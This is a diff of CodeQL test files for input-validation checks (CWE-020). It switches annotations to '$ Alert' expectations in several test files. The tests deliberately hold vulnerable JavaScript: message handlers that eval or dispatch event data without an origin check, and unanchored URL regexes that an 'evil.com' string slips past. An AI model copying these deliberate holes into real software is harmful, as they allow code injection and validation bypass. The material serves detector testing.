utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref index 5860f4b3a82a..a762ad6f8385 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingRegExpAnchor.ql \ No newline at end of file +query: Security/CWE-020/MissingRegExpAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..6fc6d6296204 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js @@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { @@ -79,23 +79,23 @@ /* * NOT OK: flagged */ - /(\.xxx)|(\.yyy)|(\.zzz)$/; + /(\.xxx)|(\.yyy)|(\.zzz)$/; // $ Alert /(^left|right|center)\sbottom$/; // not flagged at the moment due to interior anchors - /\.xxx|\.yyy|\.zzz$/ig; - /\.xxx|\.yyy|zzz$/; + /\.xxx|\.yyy|\.zzz$/ig; // $ Alert + /\.xxx|\.yyy|zzz$/; // $ Alert /^([A-Z]|xxx[XY]$)/; // not flagged at the moment due to interior anchors - /^(xxx yyy zzz)|(xxx yyy)/i; - /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; - /^(xxx:)|(yyy:)|(zzz:)/; - /^(xxx?:)|(yyy:zzz\/)/; - /^@media|@page/; - /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; - /^click|mouse|touch/; - /^http:\/\/good\.com|http:\/\/better\.com/; - /^https?:\/\/good\.com|https?:\/\/better\.com/; - /^mouse|touch|click|contextmenu|drop|dragover|dragend/; - /^xxx:|yyy:/i; - /_xxx|_yyy|_zzz$/; + /^(xxx yyy zzz)|(xxx yyy)/i; // $ Alert + /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; // $ Alert + /^(xxx:)|(yyy:)|(zzz:)/; // $ Alert + /^(xxx?:)|(yyy:zzz\/)/; // $ Alert + /^@media|@page/; // $ Alert + /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; // $ Alert + /^click|mouse|touch/; // $ Alert + /^http:\/\/good\.com|http:\/\/better\.com/; // $ Alert + /^https?:\/\/good\.com|https?:\/\/better\.com/; // $ Alert + /^mouse|touch|click|contextmenu|drop|dragover|dragend/; // $ Alert + /^xxx:|yyy:/i; // $ Alert + /_xxx|_yyy|_zzz$/; // $ Alert /em|%$/; // not flagged at the moment due to the anchor not being for letters /* diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..179273ee4502 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js @@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // $ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( @@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true @@ -74,7 +74,7 @@ var urlPatterns = [ {regex: /youtu\.be\/([\w\-.]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$1'}, {regex: /youtube\.com(.+)v=([^&]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$2'}, - {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, + {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, // $ Alert ]; // check optional successsor to TLD @@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index 77b5c92707f9..c42315c4550e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -Security/CWE-020/OverlyLargeRange.ql +query: Security/CWE-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js @@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ã‚¡-ヾ]|[ァ-ï¾ï¾žï¾Ÿ])+$/; // OK -var tst3 = /[0-9ï¼-ï¼™]/; // OK +var tst2 = /^([ã‚¡-ヾ]|[ァ-ï¾ï¾žï¾Ÿ])+$/; +var tst3 = /[0-9ï¼-ï¼™]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected index 60423f3d6677..de528b8bde2e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected @@ -1,3 +1,16 @@ +#select +| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | edges | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | provenance | | | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | provenance | | @@ -16,15 +29,15 @@ edges | tst-UntrustedDataToExternalAPI.js:10:19:10:27 | untrusted | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | provenance | | | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | provenance | | | tst-UntrustedDataToExternalAPI.js:15:16:15:24 | untrusted | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | provenance | | nodes | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | semmle.label | window.name | @@ -42,24 +55,11 @@ nodes | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | semmle.label | {} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | semmle.label | {\\n x ... usted\\n} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | semmle.label | {\\n x ... usted\\n} [x] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | semmle.label | {\\n x ... usted\\n} [y] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | semmle.label | {\\n x ... usted\\n} [z] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | semmle.label | { // $ ... usted\\n} | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | semmle.label | { // $ ... usted\\n} [x] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | semmle.label | { // $ ... usted\\n} [y] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | semmle.label | { // $ ... usted\\n} [z] | | tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | semmle.label | untrusted | subpaths -#select -| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 